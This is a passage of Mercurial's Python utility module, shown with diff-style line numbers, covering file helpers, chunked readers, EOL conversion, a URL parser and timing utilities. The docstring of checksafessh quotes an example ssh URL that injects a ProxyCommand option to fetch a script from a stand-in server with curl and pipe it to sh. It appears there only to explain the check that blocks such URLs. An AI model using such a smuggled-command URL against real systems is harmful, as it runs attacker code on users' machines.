2138 2136 self.close()
2139 2137
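# A minimal usage sketch: atomictempfile as a context manager. On a clean
# exit the temporary copy replaces 'path'; on an exception all writes are
# discarded ('_demo_atomicwrite' is a hypothetical helper).
def _demo_atomicwrite(path, data):
    with atomictempfile(path, 'wb') as fp:
        fp.write(data)
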
2140 2138 def unlinkpath(f, ignoremissing=False):
2141 2139 """unlink and remove the directory if it is empty"""
2142 2140 if ignoremissing:
2143 2141 tryunlink(f)
2144 2142 else:
2145 2143 unlink(f)
2146 2144 # try removing directories that might now be empty
2147 2145 try:
2148 2146 removedirs(os.path.dirname(f))
2149 2147 except OSError:
2150 2148 pass
2151 2149
2152 2150 def tryunlink(f):
2153 2151 """Attempt to remove a file, ignoring ENOENT errors."""
2154 2152 try:
2155 2153 unlink(f)
2156 2154 except OSError as e:
2157 2155 if e.errno != errno.ENOENT:
2158 2156 raise
2159 2157
2160 2158 def makedirs(name, mode=None, notindexed=False):
2161 2159 """recursive directory creation with parent mode inheritance
2162 2160
2163 2161 Newly created directories are marked as "not to be indexed by
2164 2162 the content indexing service" if ``notindexed`` is specified.
2166 2164 """
2167 2165 try:
2168 2166 makedir(name, notindexed)
2169 2167 except OSError as err:
2170 2168 if err.errno == errno.EEXIST:
2171 2169 return
2172 2170 if err.errno != errno.ENOENT or not name:
2173 2171 raise
2174 2172 parent = os.path.dirname(os.path.abspath(name))
2175 2173 if parent == name:
2176 2174 raise
2177 2175 makedirs(parent, mode, notindexed)
2178 2176 try:
2179 2177 makedir(name, notindexed)
2180 2178 except OSError as err:
2181 2179 # Catch EEXIST to handle races
2182 2180 if err.errno == errno.EEXIST:
2183 2181 return
2184 2182 raise
2185 2183 if mode is not None:
2186 2184 os.chmod(name, mode)
2187 2185
2188 2186 def readfile(path):
2189 2187 with open(path, 'rb') as fp:
2190 2188 return fp.read()
2191 2189
2192 2190 def writefile(path, text):
2193 2191 with open(path, 'wb') as fp:
2194 2192 fp.write(text)
2195 2193
2196 2194 def appendfile(path, text):
2197 2195 with open(path, 'ab') as fp:
2198 2196 fp.write(text)
2199 2197
2200 2198 class chunkbuffer(object):
2201 2199 """Allow arbitrary sized chunks of data to be efficiently read from an
2202 2200 iterator over chunks of arbitrary size."""
2203 2201
2204 2202 def __init__(self, in_iter):
2205 2203 """in_iter is the iterator that's iterating over the input chunks."""
2206 2204 def splitbig(chunks):
2207 2205 for chunk in chunks:
2208 2206 if len(chunk) > 2**20:
2209 2207 pos = 0
2210 2208 while pos < len(chunk):
2211 2209 end = pos + 2 ** 18
2212 2210 yield chunk[pos:end]
2213 2211 pos = end
2214 2212 else:
2215 2213 yield chunk
2216 2214 self.iter = splitbig(in_iter)
2217 2215 self._queue = collections.deque()
2218 2216 self._chunkoffset = 0
2219 2217
2220 2218 def read(self, l=None):
2221 2219 """Read L bytes of data from the iterator of chunks of data.
2222 2220 Returns less than L bytes if the iterator runs dry.
2223 2221
2224 2222 If size parameter is omitted, read everything"""
2225 2223 if l is None:
2226 2224 return ''.join(self.iter)
2227 2225
2228 2226 left = l
2229 2227 buf = []
2230 2228 queue = self._queue
2231 2229 while left > 0:
2232 2230 # refill the queue
2233 2231 if not queue:
2234 2232 target = 2**18
2235 2233 for chunk in self.iter:
2236 2234 queue.append(chunk)
2237 2235 target -= len(chunk)
2238 2236 if target <= 0:
2239 2237 break
2240 2238 if not queue:
2241 2239 break
2242 2240
2243 2241 # The easy way to do this would be to queue.popleft(), modify the
2244 2242 # chunk (if necessary), then queue.appendleft(). However, for cases
2245 2243 # where we read partial chunk content, this incurs 2 dequeue
2246 2244 # mutations and creates a new str for the remaining chunk in the
2247 2245 # queue. Our code below avoids this overhead.
2248 2246
2249 2247 chunk = queue[0]
2250 2248 chunkl = len(chunk)
2251 2249 offset = self._chunkoffset
2252 2250
2253 2251 # Use full chunk.
2254 2252 if offset == 0 and left >= chunkl:
2255 2253 left -= chunkl
2256 2254 queue.popleft()
2257 2255 buf.append(chunk)
2258 2256 # self._chunkoffset remains at 0.
2259 2257 continue
2260 2258
2261 2259 chunkremaining = chunkl - offset
2262 2260
2263 2261 # Use all of the unconsumed part of the chunk.
2264 2262 if left >= chunkremaining:
2265 2263 left -= chunkremaining
2266 2264 queue.popleft()
2267 2265 # the offset == 0 case is handled by the block above, so this
2268 2266 # won't merely copy via ``chunk[0:]``.
2269 2267 buf.append(chunk[offset:])
2270 2268 self._chunkoffset = 0
2271 2269
2272 2270 # Partial chunk needed.
2273 2271 else:
2274 2272 buf.append(chunk[offset:offset + left])
2275 2273 self._chunkoffset += left
2276 2274 left -= chunkremaining
2277 2275
2278 2276 return ''.join(buf)
2279 2277
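# A minimal sketch of chunkbuffer rechunking unevenly sized chunks into
# fixed-size reads ('_demo_chunkbuffer' is a hypothetical helper).
def _demo_chunkbuffer():
    buf = chunkbuffer(iter(['abc', 'de', 'fghi']))
    assert buf.read(4) == 'abcd'
    assert buf.read(5) == 'efghi'
    # a drained buffer reads as EOF
    assert buf.read(1) == ''
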
2280 2278 def filechunkiter(f, size=131072, limit=None):
2281 2279 """Create a generator that produces the data in the file size
2282 2280 (default 131072) bytes at a time, up to optional limit (default is
2283 2281 to read all data). Chunks may be less than size bytes if the
2284 2282 chunk is the last chunk in the file, or the file is a socket or
2285 2283 some other type of file that sometimes reads less data than is
2286 2284 requested."""
2287 2285 assert size >= 0
2288 2286 assert limit is None or limit >= 0
2289 2287 while True:
2290 2288 if limit is None:
2291 2289 nbytes = size
2292 2290 else:
2293 2291 nbytes = min(limit, size)
2294 2292 s = nbytes and f.read(nbytes)
2295 2293 if not s:
2296 2294 break
2297 2295 if limit:
2298 2296 limit -= len(s)
2299 2297 yield s
2300 2298
2301 2299 class cappedreader(object):
2302 2300 """A file object proxy that allows reading up to N bytes.
2303 2301
2304 2302 Given a source file object, instances of this type allow reading up to
2305 2303 N bytes from that source file object. Attempts to read past the allowed
2306 2304 limit are treated as EOF.
2307 2305
2308 2306 It is assumed that no I/O is performed on the original file object
2309 2307 other than the I/O performed by this instance. If there is, state
2310 2308 tracking will get out of sync and unexpected results will ensue.
2311 2309 """
2312 2310 def __init__(self, fh, limit):
2313 2311 """Allow reading up to <limit> bytes from <fh>."""
2314 2312 self._fh = fh
2315 2313 self._left = limit
2316 2314
2317 2315 def read(self, n=-1):
2318 2316 if not self._left:
2319 2317 return b''
2320 2318
2321 2319 if n < 0:
2322 2320 n = self._left
2323 2321
2324 2322 data = self._fh.read(min(n, self._left))
2325 2323 self._left -= len(data)
2326 2324 assert self._left >= 0
2327 2325
2328 2326 return data
2329 2327
2330 2328 def readinto(self, b):
2331 2329 res = self.read(len(b))
2332 2330 if res is None:
2333 2331 return None
2334 2332
2335 2333 b[0:len(res)] = res
2336 2334 return len(res)
2337 2335
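# A minimal sketch of cappedreader limiting reads on an underlying stream
# ('_demo_cappedreader' is a hypothetical helper; io.BytesIO stands in for
# a real file object).
def _demo_cappedreader():
    import io
    capped = cappedreader(io.BytesIO(b'0123456789'), 4)
    assert capped.read() == b'0123'
    # reads past the cap are treated as EOF
    assert capped.read() == b''
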
2338 2336 def unitcountfn(*unittable):
2339 2337 '''return a function that renders a readable count of some quantity'''
2340 2338
2341 2339 def go(count):
2342 2340 for multiplier, divisor, format in unittable:
2343 2341 if abs(count) >= divisor * multiplier:
2344 2342 return format % (count / float(divisor))
2345 2343 return unittable[-1][2] % count
2346 2344
2347 2345 return go
2348 2346
2349 2347 def processlinerange(fromline, toline):
2350 2348 """Check that linerange <fromline>:<toline> makes sense and return a
2351 2349 0-based range.
2352 2350
2353 2351 >>> processlinerange(10, 20)
2354 2352 (9, 20)
2355 2353 >>> processlinerange(2, 1)
2356 2354 Traceback (most recent call last):
2357 2355 ...
2358 2356 ParseError: line range must be positive
2359 2357 >>> processlinerange(0, 5)
2360 2358 Traceback (most recent call last):
2361 2359 ...
2362 2360 ParseError: fromline must be strictly positive
2363 2361 """
2364 2362 if toline - fromline < 0:
2365 2363 raise error.ParseError(_("line range must be positive"))
2366 2364 if fromline < 1:
2367 2365 raise error.ParseError(_("fromline must be strictly positive"))
2368 2366 return fromline - 1, toline
2369 2367
2370 2368 bytecount = unitcountfn(
2371 2369 (100, 1 << 30, _('%.0f GB')),
2372 2370 (10, 1 << 30, _('%.1f GB')),
2373 2371 (1, 1 << 30, _('%.2f GB')),
2374 2372 (100, 1 << 20, _('%.0f MB')),
2375 2373 (10, 1 << 20, _('%.1f MB')),
2376 2374 (1, 1 << 20, _('%.2f MB')),
2377 2375 (100, 1 << 10, _('%.0f KB')),
2378 2376 (10, 1 << 10, _('%.1f KB')),
2379 2377 (1, 1 << 10, _('%.2f KB')),
2380 2378 (1, 1, _('%.0f bytes')),
2381 2379 )
2382 2380
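# Illustrative values for bytecount(), worked from the unit table above
# (these are not doctests from the original module):
#
#   bytecount(0)        -> '0 bytes'
#   bytecount(2048)     -> '2.00 KB'
#   bytecount(10 << 20) -> '10.0 MB'
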
2383 2381 class transformingwriter(object):
2384 2382 """Writable file wrapper to transform data by function"""
2385 2383
2386 2384 def __init__(self, fp, encode):
2387 2385 self._fp = fp
2388 2386 self._encode = encode
2389 2387
2390 2388 def close(self):
2391 2389 self._fp.close()
2392 2390
2393 2391 def flush(self):
2394 2392 self._fp.flush()
2395 2393
2396 2394 def write(self, data):
2397 2395 return self._fp.write(self._encode(data))
2398 2396
2399 2397 # Matches a single EOL which can either be a CRLF (where repeated CRs
2400 2398 # are removed) or a LF. We do not care about old Macintosh files, so a
2401 2399 # stray CR is an error.
2402 2400 _eolre = remod.compile(br'\r*\n')
2403 2401
2404 2402 def tolf(s):
2405 2403 return _eolre.sub('\n', s)
2406 2404
2407 2405 def tocrlf(s):
2408 2406 return _eolre.sub('\r\n', s)
2409 2407
2410 2408 def _crlfwriter(fp):
2411 2409 return transformingwriter(fp, tocrlf)
2412 2410
2413 2411 if pycompat.oslinesep == '\r\n':
2414 2412 tonativeeol = tocrlf
2415 2413 fromnativeeol = tolf
2416 2414 nativeeolwriter = _crlfwriter
2417 2415 else:
2418 2416 tonativeeol = pycompat.identity
2419 2417 fromnativeeol = pycompat.identity
2420 2418 nativeeolwriter = pycompat.identity
2421 2419
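# A minimal sketch of the EOL helpers above ('_demo_eol' is a hypothetical
# helper; the last assertion assumes a POSIX host where
# pycompat.oslinesep == '\n').
def _demo_eol():
    assert tolf('a\r\nb\n') == 'a\nb\n'
    assert tocrlf('a\nb\r\n') == 'a\r\nb\r\n'
    # on POSIX hosts tonativeeol is the identity function
    assert tonativeeol('a\nb\n') == 'a\nb\n'
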
2422 2420 if (pyplatform.python_implementation() == 'CPython' and
2423 2421 sys.version_info < (3, 0)):
2424 2422 # There is an issue in CPython that some IO methods do not handle EINTR
2425 2423 # correctly. The following table shows what CPython version (and functions)
2426 2424 # are affected (buggy: has the EINTR bug, okay: otherwise):
2427 2425 #
2428 2426 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2429 2427 # --------------------------------------------------
2430 2428 # fp.__iter__ | buggy | buggy | okay
2431 2429 # fp.read* | buggy | okay [1] | okay
2432 2430 #
2433 2431 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2434 2432 #
2435 2433 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2436 2434 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2437 2435 #
2438 2436 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2439 2437 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2440 2438 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2441 2439 # fp.__iter__ but not other fp.read* methods.
2442 2440 #
2443 2441 # On modern systems like Linux, the "read" syscall cannot be interrupted
2444 2442 # when reading "fast" files like on-disk files. So the EINTR issue only
2445 2443 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2446 2444 # files approximately as "fast" files and use the fast (unsafe) code path,
2447 2445 # to minimize the performance impact.
2448 2446 if sys.version_info >= (2, 7, 4):
2449 2447 # fp.readline deals with EINTR correctly, use it as a workaround.
2450 2448 def _safeiterfile(fp):
2451 2449 return iter(fp.readline, '')
2452 2450 else:
2453 2451 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2454 2452 # note: this may block longer than necessary because of bufsize.
2455 2453 def _safeiterfile(fp, bufsize=4096):
2456 2454 fd = fp.fileno()
2457 2455 line = ''
2458 2456 while True:
2459 2457 try:
2460 2458 buf = os.read(fd, bufsize)
2461 2459 except OSError as ex:
2462 2460 # os.read only raises EINTR before any data is read
2463 2461 if ex.errno == errno.EINTR:
2464 2462 continue
2465 2463 else:
2466 2464 raise
2467 2465 line += buf
2468 2466 if '\n' in buf:
2469 2467 splitted = line.splitlines(True)
2470 2468 line = ''
2471 2469 for l in splitted:
2472 2470 if l[-1] == '\n':
2473 2471 yield l
2474 2472 else:
2475 2473 line = l
2476 2474 if not buf:
2477 2475 break
2478 2476 if line:
2479 2477 yield line
2480 2478
2481 2479 def iterfile(fp):
2482 2480 fastpath = True
2483 2481 if type(fp) is file:
2484 2482 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2485 2483 if fastpath:
2486 2484 return fp
2487 2485 else:
2488 2486 return _safeiterfile(fp)
2489 2487 else:
2490 2488 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2491 2489 def iterfile(fp):
2492 2490 return fp
2493 2491
2494 2492 def iterlines(iterator):
2495 2493 for chunk in iterator:
2496 2494 for line in chunk.splitlines():
2497 2495 yield line
2498 2496
2499 2497 def expandpath(path):
2500 2498 return os.path.expanduser(os.path.expandvars(path))
2501 2499
2502 2500 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2503 2501 """Return the result of interpolating items in the mapping into string s.
2504 2502
2505 2503 prefix is a single character string, or a two character string with
2506 2504 a backslash as the first character if the prefix needs to be escaped in
2507 2505 a regular expression.
2508 2506
2509 2507 fn is an optional function that will be applied to the replacement text
2510 2508 just before replacement.
2511 2509
2512 2510 escape_prefix is an optional flag that allows using doubled prefix for
2513 2511 its escaping.
2514 2512 """
2515 2513 fn = fn or (lambda s: s)
2516 2514 patterns = '|'.join(mapping.keys())
2517 2515 if escape_prefix:
2518 2516 patterns += '|' + prefix
2519 2517 if len(prefix) > 1:
2520 2518 prefix_char = prefix[1:]
2521 2519 else:
2522 2520 prefix_char = prefix
2523 2521 mapping[prefix_char] = prefix_char
2524 2522 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2525 2523 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2526 2524
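# A minimal sketch of interpolate() expanding '%x'-style items from a
# mapping ('_demo_interpolate' is a hypothetical helper with illustrative
# values).
def _demo_interpolate():
    mapping = {'u': 'alice', 'r': 'repo'}
    # -> 'user alice on repo'
    return interpolate('%', mapping, 'user %u on %r')
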
2527 2525 def getport(port):
2528 2526 """Return the port for a given network service.
2529 2527
2530 2528 If port is an integer, it's returned as is. If it's a string, it's
2531 2529 looked up using socket.getservbyname(). If there's no matching
2532 2530 service, error.Abort is raised.
2533 2531 """
2534 2532 try:
2535 2533 return int(port)
2536 2534 except ValueError:
2537 2535 pass
2538 2536
2539 2537 try:
2540 2538 return socket.getservbyname(pycompat.sysstr(port))
2541 2539 except socket.error:
2542 2540 raise error.Abort(_("no port number associated with service '%s'")
2543 2541 % port)
2544 2542
2545 2543 class url(object):
2546 2544 r"""Reliable URL parser.
2547 2545
2548 2546 This parses URLs and provides attributes for the following
2549 2547 components:
2550 2548
2551 2549 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2552 2550
2553 2551 Missing components are set to None. The only exception is
2554 2552 fragment, which is set to '' if present but empty.
2555 2553
2556 2554 If parsefragment is False, fragment is included in query. If
2557 2555 parsequery is False, query is included in path. If both are
2558 2556 False, both fragment and query are included in path.
2559 2557
2560 2558 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2561 2559
2562 2560 Note that for backward compatibility reasons, bundle URLs do not
2563 2561 take host names. That means 'bundle://../' has a path of '../'.
2564 2562
2565 2563 Examples:
2566 2564
2567 2565 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2568 2566 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2569 2567 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2570 2568 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2571 2569 >>> url(b'file:///home/joe/repo')
2572 2570 <url scheme: 'file', path: '/home/joe/repo'>
2573 2571 >>> url(b'file:///c:/temp/foo/')
2574 2572 <url scheme: 'file', path: 'c:/temp/foo/'>
2575 2573 >>> url(b'bundle:foo')
2576 2574 <url scheme: 'bundle', path: 'foo'>
2577 2575 >>> url(b'bundle://../foo')
2578 2576 <url scheme: 'bundle', path: '../foo'>
2579 2577 >>> url(br'c:\foo\bar')
2580 2578 <url path: 'c:\\foo\\bar'>
2581 2579 >>> url(br'\\blah\blah\blah')
2582 2580 <url path: '\\\\blah\\blah\\blah'>
2583 2581 >>> url(br'\\blah\blah\blah#baz')
2584 2582 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2585 2583 >>> url(br'file:///C:\users\me')
2586 2584 <url scheme: 'file', path: 'C:\\users\\me'>
2587 2585
2588 2586 Authentication credentials:
2589 2587
2590 2588 >>> url(b'ssh://joe:xyz@x/repo')
2591 2589 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2592 2590 >>> url(b'ssh://joe@x/repo')
2593 2591 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2594 2592
2595 2593 Query strings and fragments:
2596 2594
2597 2595 >>> url(b'http://host/a?b#c')
2598 2596 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2599 2597 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2600 2598 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2601 2599
2602 2600 Empty path:
2603 2601
2604 2602 >>> url(b'')
2605 2603 <url path: ''>
2606 2604 >>> url(b'#a')
2607 2605 <url path: '', fragment: 'a'>
2608 2606 >>> url(b'http://host/')
2609 2607 <url scheme: 'http', host: 'host', path: ''>
2610 2608 >>> url(b'http://host/#a')
2611 2609 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2612 2610
2613 2611 Only scheme:
2614 2612
2615 2613 >>> url(b'http:')
2616 2614 <url scheme: 'http'>
2617 2615 """
2618 2616
2619 2617 _safechars = "!~*'()+"
2620 2618 _safepchars = "/!~*'()+:\\"
2621 2619 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2622 2620
2623 2621 def __init__(self, path, parsequery=True, parsefragment=True):
2624 2622 # We slowly chomp away at path until we have only the path left
2625 2623 self.scheme = self.user = self.passwd = self.host = None
2626 2624 self.port = self.path = self.query = self.fragment = None
2627 2625 self._localpath = True
2628 2626 self._hostport = ''
2629 2627 self._origpath = path
2630 2628
2631 2629 if parsefragment and '#' in path:
2632 2630 path, self.fragment = path.split('#', 1)
2633 2631
2634 2632 # special case for Windows drive letters and UNC paths
2635 2633 if hasdriveletter(path) or path.startswith('\\\\'):
2636 2634 self.path = path
2637 2635 return
2638 2636
2639 2637 # For compatibility reasons, we can't handle bundle paths as
2640 2638 # normal URLS
2641 2639 if path.startswith('bundle:'):
2642 2640 self.scheme = 'bundle'
2643 2641 path = path[7:]
2644 2642 if path.startswith('//'):
2645 2643 path = path[2:]
2646 2644 self.path = path
2647 2645 return
2648 2646
2649 2647 if self._matchscheme(path):
2650 2648 parts = path.split(':', 1)
2651 2649 if parts[0]:
2652 2650 self.scheme, path = parts
2653 2651 self._localpath = False
2654 2652
2655 2653 if not path:
2656 2654 path = None
2657 2655 if self._localpath:
2658 2656 self.path = ''
2659 2657 return
2660 2658 else:
2661 2659 if self._localpath:
2662 2660 self.path = path
2663 2661 return
2664 2662
2665 2663 if parsequery and '?' in path:
2666 2664 path, self.query = path.split('?', 1)
2667 2665 if not path:
2668 2666 path = None
2669 2667 if not self.query:
2670 2668 self.query = None
2671 2669
2672 2670 # // is required to specify a host/authority
2673 2671 if path and path.startswith('//'):
2674 2672 parts = path[2:].split('/', 1)
2675 2673 if len(parts) > 1:
2676 2674 self.host, path = parts
2677 2675 else:
2678 2676 self.host = parts[0]
2679 2677 path = None
2680 2678 if not self.host:
2681 2679 self.host = None
2682 2680 # path of file:///d is /d
2683 2681 # path of file:///d:/ is d:/, not /d:/
2684 2682 if path and not hasdriveletter(path):
2685 2683 path = '/' + path
2686 2684
2687 2685 if self.host and '@' in self.host:
2688 2686 self.user, self.host = self.host.rsplit('@', 1)
2689 2687 if ':' in self.user:
2690 2688 self.user, self.passwd = self.user.split(':', 1)
2691 2689 if not self.host:
2692 2690 self.host = None
2693 2691
2694 2692 # Don't split on colons in IPv6 addresses without ports
2695 2693 if (self.host and ':' in self.host and
2696 2694 not (self.host.startswith('[') and self.host.endswith(']'))):
2697 2695 self._hostport = self.host
2698 2696 self.host, self.port = self.host.rsplit(':', 1)
2699 2697 if not self.host:
2700 2698 self.host = None
2701 2699
2702 2700 if (self.host and self.scheme == 'file' and
2703 2701 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2704 2702 raise error.Abort(_('file:// URLs can only refer to localhost'))
2705 2703
2706 2704 self.path = path
2707 2705
2708 2706 # leave the query string escaped
2709 2707 for a in ('user', 'passwd', 'host', 'port',
2710 2708 'path', 'fragment'):
2711 2709 v = getattr(self, a)
2712 2710 if v is not None:
2713 2711 setattr(self, a, urlreq.unquote(v))
2714 2712
2715 2713 @encoding.strmethod
2716 2714 def __repr__(self):
2717 2715 attrs = []
2718 2716 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2719 2717 'query', 'fragment'):
2720 2718 v = getattr(self, a)
2721 2719 if v is not None:
2722 2720 attrs.append('%s: %r' % (a, v))
2723 2721 return '<url %s>' % ', '.join(attrs)
2724 2722
2725 2723 def __bytes__(self):
2726 2724 r"""Join the URL's components back into a URL string.
2727 2725
2728 2726 Examples:
2729 2727
2730 2728 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2731 2729 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2732 2730 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2733 2731 'http://user:pw@host:80/?foo=bar&baz=42'
2734 2732 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2735 2733 'http://user:pw@host:80/?foo=bar%3dbaz'
2736 2734 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2737 2735 'ssh://user:pw@[::1]:2200//home/joe#'
2738 2736 >>> bytes(url(b'http://localhost:80//'))
2739 2737 'http://localhost:80//'
2740 2738 >>> bytes(url(b'http://localhost:80/'))
2741 2739 'http://localhost:80/'
2742 2740 >>> bytes(url(b'http://localhost:80'))
2743 2741 'http://localhost:80/'
2744 2742 >>> bytes(url(b'bundle:foo'))
2745 2743 'bundle:foo'
2746 2744 >>> bytes(url(b'bundle://../foo'))
2747 2745 'bundle:../foo'
2748 2746 >>> bytes(url(b'path'))
2749 2747 'path'
2750 2748 >>> bytes(url(b'file:///tmp/foo/bar'))
2751 2749 'file:///tmp/foo/bar'
2752 2750 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2753 2751 'file:///c:/tmp/foo/bar'
2754 2752 >>> print(url(br'bundle:foo\bar'))
2755 2753 bundle:foo\bar
2756 2754 >>> print(url(br'file:///D:\data\hg'))
2757 2755 file:///D:\data\hg
2758 2756 """
2759 2757 if self._localpath:
2760 2758 s = self.path
2761 2759 if self.scheme == 'bundle':
2762 2760 s = 'bundle:' + s
2763 2761 if self.fragment:
2764 2762 s += '#' + self.fragment
2765 2763 return s
2766 2764
2767 2765 s = self.scheme + ':'
2768 2766 if self.user or self.passwd or self.host:
2769 2767 s += '//'
2770 2768 elif self.scheme and (not self.path or self.path.startswith('/')
2771 2769 or hasdriveletter(self.path)):
2772 2770 s += '//'
2773 2771 if hasdriveletter(self.path):
2774 2772 s += '/'
2775 2773 if self.user:
2776 2774 s += urlreq.quote(self.user, safe=self._safechars)
2777 2775 if self.passwd:
2778 2776 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2779 2777 if self.user or self.passwd:
2780 2778 s += '@'
2781 2779 if self.host:
2782 2780 if not (self.host.startswith('[') and self.host.endswith(']')):
2783 2781 s += urlreq.quote(self.host)
2784 2782 else:
2785 2783 s += self.host
2786 2784 if self.port:
2787 2785 s += ':' + urlreq.quote(self.port)
2788 2786 if self.host:
2789 2787 s += '/'
2790 2788 if self.path:
2791 2789 # TODO: similar to the query string, we should not unescape the
2792 2790 # path when we store it, the path might contain '%2f' = '/',
2793 2791 # which we should *not* escape.
2794 2792 s += urlreq.quote(self.path, safe=self._safepchars)
2795 2793 if self.query:
2796 2794 # we store the query in escaped form.
2797 2795 s += '?' + self.query
2798 2796 if self.fragment is not None:
2799 2797 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2800 2798 return s
2801 2799
2802 2800 __str__ = encoding.strmethod(__bytes__)
2803 2801
2804 2802 def authinfo(self):
2805 2803 user, passwd = self.user, self.passwd
2806 2804 try:
2807 2805 self.user, self.passwd = None, None
2808 2806 s = bytes(self)
2809 2807 finally:
2810 2808 self.user, self.passwd = user, passwd
2811 2809 if not self.user:
2812 2810 return (s, None)
2813 2811 # authinfo[1] is passed to urllib2 password manager, and its
2814 2812 # URIs must not contain credentials. The host is passed in the
2815 2813 # URIs list because Python < 2.4.3 uses only that to search for
2816 2814 # a password.
2817 2815 return (s, (None, (s, self.host),
2818 2816 self.user, self.passwd or ''))
2819 2817
2820 2818 def isabs(self):
2821 2819 if self.scheme and self.scheme != 'file':
2822 2820 return True # remote URL
2823 2821 if hasdriveletter(self.path):
2824 2822 return True # absolute for our purposes - can't be joined()
2825 2823 if self.path.startswith(br'\\'):
2826 2824 return True # Windows UNC path
2827 2825 if self.path.startswith('/'):
2828 2826 return True # POSIX-style
2829 2827 return False
2830 2828
2831 2829 def localpath(self):
2832 2830 if self.scheme == 'file' or self.scheme == 'bundle':
2833 2831 path = self.path or '/'
2834 2832 # For Windows, we need to promote hosts containing drive
2835 2833 # letters to paths with drive letters.
2836 2834 if hasdriveletter(self._hostport):
2837 2835 path = self._hostport + '/' + self.path
2838 2836 elif (self.host is not None and self.path
2839 2837 and not hasdriveletter(path)):
2840 2838 path = '/' + path
2841 2839 return path
2842 2840 return self._origpath
2843 2841
2844 2842 def islocal(self):
2845 2843 '''whether localpath will return something that posixfile can open'''
2846 2844 return (not self.scheme or self.scheme == 'file'
2847 2845 or self.scheme == 'bundle')
2848 2846
2849 2847 def hasscheme(path):
2850 2848 return bool(url(path).scheme)
2851 2849
2852 2850 def hasdriveletter(path):
2853 2851 return path and path[1:2] == ':' and path[0:1].isalpha()
2854 2852
2855 2853 def urllocalpath(path):
2856 2854 return url(path, parsequery=False, parsefragment=False).localpath()
2857 2855
2858 2856 def checksafessh(path):
2859 2857 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2860 2858
2861 2859 This is a sanity check for ssh urls. ssh will parse the first item as
2862 2860 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2863 2861 Let's prevent these potentially exploitable urls entirely and warn the
2864 2862 user.
2865 2863
2866 2864 Raises an error.Abort when the url is unsafe.
2867 2865 """
2868 2866 path = urlreq.unquote(path)
2869 2867 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2870 2868 raise error.Abort(_('potentially unsafe url: %r') %
2871 2869 (pycompat.bytestr(path),))
2872 2870
2873 2871 def hidepassword(u):
2874 2872 '''hide user credential in a url string'''
2875 2873 u = url(u)
2876 2874 if u.passwd:
2877 2875 u.passwd = '***'
2878 2876 return bytes(u)
2879 2877
2880 2878 def removeauth(u):
2881 2879 '''remove all authentication information from a url string'''
2882 2880 u = url(u)
2883 2881 u.user = u.passwd = None
2884 2882 return bytes(u)
2885 2883
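# Illustrative values for the two helpers above, worked from url.__bytes__
# (these are not doctests from the original module):
#
#   hidepassword('http://joe:secret@host/repo') -> 'http://joe:***@host/repo'
#   removeauth('http://joe:secret@host/repo')   -> 'http://host/repo'
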
2886 2884 timecount = unitcountfn(
2887 2885 (1, 1e3, _('%.0f s')),
2888 2886 (100, 1, _('%.1f s')),
2889 2887 (10, 1, _('%.2f s')),
2890 2888 (1, 1, _('%.3f s')),
2891 2889 (100, 0.001, _('%.1f ms')),
2892 2890 (10, 0.001, _('%.2f ms')),
2893 2891 (1, 0.001, _('%.3f ms')),
2894 2892 (100, 0.000001, _('%.1f us')),
2895 2893 (10, 0.000001, _('%.2f us')),
2896 2894 (1, 0.000001, _('%.3f us')),
2897 2895 (100, 0.000000001, _('%.1f ns')),
2898 2896 (10, 0.000000001, _('%.2f ns')),
2899 2897 (1, 0.000000001, _('%.3f ns')),
2900 2898 )
2901 2899
2902 2900 _timenesting = [0]
2903 2901
2904 2902 def timed(func):
2905 2903 '''Report the execution time of a function call to stderr.
2906 2904
2907 2905 During development, use as a decorator when you need to measure
2908 2906 the cost of a function, e.g. as follows:
2909 2907
2910 2908 @util.timed
2911 2909 def foo(a, b, c):
2912 2910 pass
2913 2911 '''
2914 2912
2915 2913 def wrapper(*args, **kwargs):
2916 2914 start = timer()
2917 2915 indent = 2
2918 2916 _timenesting[0] += indent
2919 2917 try:
2920 2918 return func(*args, **kwargs)
2921 2919 finally:
2922 2920 elapsed = timer() - start
2923 2921 _timenesting[0] -= indent
2924 2922 stderr.write('%s%s: %s\n' %
2925 2923 (' ' * _timenesting[0], func.__name__,
2926 2924 timecount(elapsed)))
2927 2925 return wrapper
2928 2926
